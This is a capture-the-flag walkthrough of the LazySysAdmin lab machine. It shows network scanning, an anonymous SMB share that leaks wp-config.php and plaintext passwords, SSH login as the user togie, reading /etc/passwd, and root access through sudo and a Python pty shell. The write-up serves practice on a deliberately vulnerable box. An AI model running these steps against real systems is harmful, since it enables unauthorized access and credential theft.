LazySysAdmin Walkthrough :-
I personally enjoyed playing with this box, this box taught me how to stay focused while doing enumeration and exploitation. There’s so much going on with this box for post exploitation. let’s pwn it ..!!!
Network Scanning
We always start with network scanning, Let’s find the target IP address by running netdiscover.
┌─[✗]─[root@RDX]─[~]
└──╼ #netdiscover -i wlan0
As we saw in netdiscover result. Our target ip address is 192.168.43.15
Enumeration/Reconnaissance
Our next step is scanning the target machine. let’s start with nmap.
┌─[✗]─[root@RDX]─[~]
└──╼#nmap -v -sT 192.168.43.15
With the help of nmap we are able to scan all open tcp ports
Starting with the port number 139,445 which is smb,
┌─[✗]─[root@RDX]─[~]
└──╼#smbclient -L //192.168.43.15
we can use smbclient for sharing the file in the network. Here we are able to login successfully using anonymous login and now we can access the ‘share$’ drive.
┌─[✗]─[root@RDX]─[~]
└──╼ #smbclient ‘\\192.168.43.15/share$’
smb: \> ls
smb: \> get deets.txt
smb: \> get robots.txt
smb: \> ls
smb: \> cd wordpress\
smb: \wordpress\> ls
smb: \wordpress\> get wp-config.php
┌─[✗]─[root@RDX]─[~]
└──╼ #cat wp-config.php
(‘DB_USER’, ‘Admin’);
(‘DB_PASSWORD’, ‘TogieMYSQL12345^^’);
open in browser http://192.168.43.124/wordpress
now i have my user
┌─[root@RDX]─[~]
└──╼ #cat deets.txt
CBF Remembering all these passwords.
Remember to remove this file and update your password after we push out the server.
Password 12345
THEN wp-user & find the user to ssh login
user- togie
passwd — 12345
┌─[root@RDX]─[~]
└──╼ #ssh togie@192.168.43.15
Privilege Escalationtogie@LazySysAdmin:~$ id
togie@LazySysAdmin:~$ cat /etc/passwd
Privilege Escalation
2 ways to root the machine :-
1
togie@LazySysAdmin:~$ sudo -i
[sudo] password for togie:
root@LazySysAdmin:~# id
uid=0(root) gid=0(root) groups=0(root)
2
togie@LazySysAdmin:~$ sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’
[sudo] password for togie:
root@LazySysAdmin:~# id
uid=0(root) gid=0(root) groups=0(root)
root@LazySysAdmin:~# cat proof.txt